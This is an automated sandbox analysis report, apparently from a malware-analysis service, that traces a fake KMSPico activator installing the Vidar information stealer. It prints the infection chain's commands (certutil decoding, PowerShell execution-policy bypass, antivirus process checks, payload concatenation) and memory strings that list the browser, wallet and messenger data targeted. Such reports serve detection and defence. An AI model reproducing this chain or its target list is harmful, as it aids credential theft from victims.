Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C43FC4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	12_2_00007FF6D9C43FC4
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Code function: 22_2_00406301 FindFirstFileW,FindClose,	22_2_00406301
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Code function: 22_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	22_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_0055DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	32_2_0055DC54
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_0056A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	32_2_0056A087
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_0056A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	32_2_0056A1E2
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_0055E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	32_2_0055E472
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_0056A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	32_2_0056A570
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_0052C622 FindFirstFileExW,	32_2_0052C622
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_005666DC FindFirstFileW,FindNextFileW,FindClose,	32_2_005666DC
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_00567333 FindFirstFileW,FindClose,	32_2_00567333
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_005673D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	32_2_005673D4
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_0055D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	32_2_0055D921

Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com

Code function: 32_2_004F5FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

32_2_004F5FC8

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\Local\Temp\615578\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\Local\Temp\615578
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\

Source: Participating.com, 00000020.00000003.2174800196.00000000011F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 12.1294acdd3f4c6dd4a258e9798170c0159INSERT_KEY_HEREGetProcALoadLibrlstrcatAOpenEvenCreateEvCloseHanVirtualAllocExNuVirtualFGetSysteVirtualAHeapAlloGetComputerNameAlstrcpyAGetProceGetCurrentProceslstrlenAExitProcSystemTimeToFileadvapi32gdi32.dluser32.dcrypt32.ntdll.dlGetUserNCreateDCGetDevicReleaseDVMwareVMJohnDoe%hu/%hu/GetEnvironmentVariableAGetFileAttributeGlobalLoHeapFreeGetFileSGlobalSiIsWow64PProcess3GetLocalFreeLibrGetTimeZoneInforGetSystemPowerStGetWindowsDirectGetModuleFileNamDeleteFiFindNextLocalFreFindClosSetEnvironmentVaLocalAllReadFileSetFilePWriteFilCreateFiFindFirsCopyFileVirtualPGetLastElstrcpynMultiByteToWideCGlobalFrWideCharToMultiBGlobalAlOpenProcTerminateProcessgdiplus.ole32.dlbcrypt.dwininet.shlwapi.shell32.psapi.dlrstrtmgrCreateCompatibleSelectObDeleteObGdiplusSGdiplusShutdownGdipSaveImageToSGdipDisposeImageGdipFreeGetHGlobalFromStCreateStreamOnHGCoUninitCoInitiaCoCreateInstanceBCryptDeBCryptSetPropertBCryptDestroyKeyGetWindoGetDesktopWindowCloseWinwsprintfEnumDisplayDevicGetKeyboardLayouCharToOeRegQueryValueExARegEnumKRegOpenKRegCloseRegEnumVCryptBinaryToStrSHGetFolderPathAShellExecuteExAInternetOpenUrlAInternetConnectAInternetCloseHanInternetHttpSendRequestAHttpOpenRequestAInternetReadFileInternetCrackUrlStrCmpCAStrStrAStrCmpCWPathMatcRmStartSRmRegisterResourRmGetLisRmEndSessqlite3_sqlite3_prepare_sqlite3_column_tsqlite3_finalizesqlite3_column_bencrypteNSS_InitNSS_ShutPK11_GetInternalKeySlotPK11_FrePK11_AuthenticatPK11SDR_DecryptC:\ProgramData\profile:Login: PasswordOperaGXNetworkCookiesAutofillHistoryMonth: Login DaWeb Datalogins.jformSubmusernameencryptedUsernamencryptedPassworcookies.places.sPluginsSync Extension SettingsIndexedDOpera StOpera GX StableCURRENTchrome-extension_0.indexeddb.levLocal StprofilesfirefoxWallets%08lX%04ProductN%d/%d/%d %d:%d:%DisplayNDisplayVfreebl3.mozglue.msvcp140nss3.dllsoftokn3vcruntime140.dll/c start%DESKTOP%APPDATA%LOCALAP%USERPRO%DOCUMEN%PROGRAM%PROGRAMFILES_86%RECENT%\discord\Local Storage\l\Telegram Desktokey_dataD877F783D5D3EF8CA7FDF864FBC10B77A92DAA6EA6F891F2F8806DD0C461824FTelegram\.purpleaccountsdQw4w9Wgtoken: Software\Valve\SSteamPat\config\config.vDialogConfig.vdflibraryfolders.vloginuse\Steam\sqlite3.browsers\Discord\tokens.HTTP/1.1file_nammessagescreensh
Source: chrome.exe, 00000025.00000002.2475996188.00006F7000708000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: chrome.exe, 00000025.00000002.2476784297.00006F700081C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware Virtual USB Mouse
Source: Participating.com, 00000020.00000002.2524345296.0000000001154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWXW.
Source: powershell.exe, 00000011.00000002.1681817977.0000022DC1A18000.00000004.00000800.00020000.00000000.sdmp, putt.exe.17.dr, din[1].exe.17.dr	Binary or memory string: =qEMu
Source: powershell.exe, 00000011.00000002.1695274380.0000022DC9E0C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: chrome.exe, 00000025.00000002.2497813176.00006F7000DE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=6a253229-5b5c-486e-968a-8ee82c967082
Source: Participating.com, 00000020.00000003.2174800196.00000000011F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVM
Source: powershell.exe, 00000011.00000002.1699293363.0000022DCAA30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RA!
Source: Participating.com, 00000020.00000002.2524719395.0000000001226000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ntdll.dlGetUserNCreateDCGetDevicReleaseDVMwareVMJohnDoe%hu/%hu/GetEnvironmentVariableAGetFileAttributeGlobalLoHeapFreeGetFileSGlobalSiIsWow64PProcess3GetLocalFreeLibrGetTimeZoneInforGetSystemPowerSt
Source: powershell.exe, 00000011.00000002.1699293363.0000022DCAA30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWT
Source: powershell.exe, 00000011.00000002.1699293363.0000022DCAA68000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1699293363.0000022DCAA30000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1696225335.0000022DC9E95000.00000004.00000020.00020000.00000000.sdmp, Participating.com, 00000020.00000002.2526185064.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2525300370.000001A3B342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2525245622.000001A3B3413000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2528728809.000001A3B8A54000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Participating.com, 00000020.00000002.2529145325.0000000004CAD000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: chrome.exe, 00000025.00000002.2464553684.0000024282349000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com

Code function: 32_2_0056F4FF BlockInput,

32_2_0056F4FF

Source: C:\Windows\Installer\MSIC534.tmp

Code function: 12_2_00007FF6D9C28B00 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

12_2_00007FF6D9C28B00

Source: C:\Windows\Installer\MSIC534.tmp

Code function: 12_2_00007FF6D9C027B8 GetLastError,IsDebuggerPresent,OutputDebugStringW,

12_2_00007FF6D9C027B8

Source: C:\Users\user\AppData\Local\Temp\putt.exe

Code function: 22_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

22_2_00406328

Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com

Code function: 32_2_00515058 mov eax, dword ptr fs:[00000030h]

32_2_00515058

Source: C:\Windows\Installer\MSIC534.tmp

Code function: 12_2_00007FF6D9BF21E0 GetProcessHeap,

12_2_00007FF6D9BF21E0

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Windows\Installer\MSIC534.tmp "C:\Windows\Installer\MSIC534.tmp" /DontWait "C:\Program Files (x86)\SoftPortable\KmsPicoAuto\1.bat"

Jump to behavior

Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C28B00 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00007FF6D9C28B00
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C28CE8 SetUnhandledExceptionFilter,	12_2_00007FF6D9C28CE8
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C2DB38 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00007FF6D9C2DB38
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C28104 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_00007FF6D9C28104
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_00522992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	32_2_00522992
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_00510BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	32_2_00510BAF
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_00510D45 SetUnhandledExceptionFilter,	32_2_00510D45
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_00510F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	32_2_00510F91

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cscript.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user~1\AppData\Local\Temp\2975.ps1"

Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com

32_2_00551B4D

Source: C:\Windows\Installer\MSIC534.tmp

Code function: 12_2_00007FF6D9BF72B0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,GetProcessId,AllowSetForegroundWindow,GetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,AttachThreadInput,WaitForSingleObject,GetExitCodeProcess,

12_2_00007FF6D9BF72B0

Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com

Code function: 32_2_0055BBED SendInput,keybd_event,

32_2_0055BBED

Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com

Code function: 32_2_0055EC6C mouse_event,

32_2_0055EC6C

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -decode -f C:\Users\user~1\AppData\Local\Temp\2975.ps1 C:\Users\user~1\AppData\Local\Temp\2975.ps1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript.exe //nologo "C:\Users\user~1\AppData\Local\Temp\runner.vbs"	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user~1\AppData\Local\Temp\2975.ps1"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\putt.exe "C:\Users\user~1\AppData\Local\Temp\putt.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Verzeichnis Verzeichnis.cmd && Verzeichnis.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 615578
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "applied" Manually
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Saddam + ..\Intro + ..\Perfectly + ..\Robertson + ..\Warm w
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\615578\Participating.com Participating.com w
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5

Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com

Code function: 32_2_005514AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

32_2_005514AE

Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com

Code function: 32_2_00551FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

32_2_00551FB0

Source: Participating.com, 00000020.00000000.1743130489.00000000005B3000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Participating.com	Binary or memory string: Shell_TrayWnd

Source: C:\Windows\Installer\MSIC534.tmp

Code function: 12_2_00007FF6D9C4CB40 cpuid

12_2_00007FF6D9C4CB40

Source: C:\Windows\Installer\MSIC534.tmp	Code function: GetLocaleInfoEx,FormatMessageA,	12_2_00007FF6D9C02C64
Source: C:\Windows\Installer\MSIC534.tmp	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	12_2_00007FF6D9C47BB4
Source: C:\Windows\Installer\MSIC534.tmp	Code function: EnumSystemLocalesW,	12_2_00007FF6D9C47F18
Source: C:\Windows\Installer\MSIC534.tmp	Code function: EnumSystemLocalesW,	12_2_00007FF6D9C40EE4
Source: C:\Windows\Installer\MSIC534.tmp	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	12_2_00007FF6D9C48080
Source: C:\Windows\Installer\MSIC534.tmp	Code function: EnumSystemLocalesW,	12_2_00007FF6D9C47FE8
Source: C:\Windows\Installer\MSIC534.tmp	Code function: GetLocaleInfoW,	12_2_00007FF6D9C482D0
Source: C:\Windows\Installer\MSIC534.tmp	Code function: GetLocaleInfoW,	12_2_00007FF6D9C484DC
Source: C:\Windows\Installer\MSIC534.tmp	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	12_2_00007FF6D9C48428
Source: C:\Windows\Installer\MSIC534.tmp	Code function: GetLocaleInfoW,	12_2_00007FF6D9C41430
Source: C:\Windows\Installer\MSIC534.tmp	Code function: EnumSystemLocalesW,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	12_2_00007FF6D9C48620
Source: C:\Windows\Installer\MSIC534.tmp	Code function: GetLocaleInfoEx,	12_2_00007FF6D9C275BC

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\Installer\MSIC534.tmp

Code function: 12_2_00007FF6D9C28D5C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

12_2_00007FF6D9C28D5C

Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com

Code function: 32_2_0054E652 GetUserNameW,

32_2_0054E652

Source: C:\Windows\Installer\MSIC534.tmp

Code function: 12_2_00007FF6D9C41CAC _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

12_2_00007FF6D9C41CAC

Source: C:\Users\user\AppData\Local\Temp\putt.exe

Code function: 22_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

22_2_00406831

Source: C:\Windows\System32\cscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: Participating.com PID: 1252, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

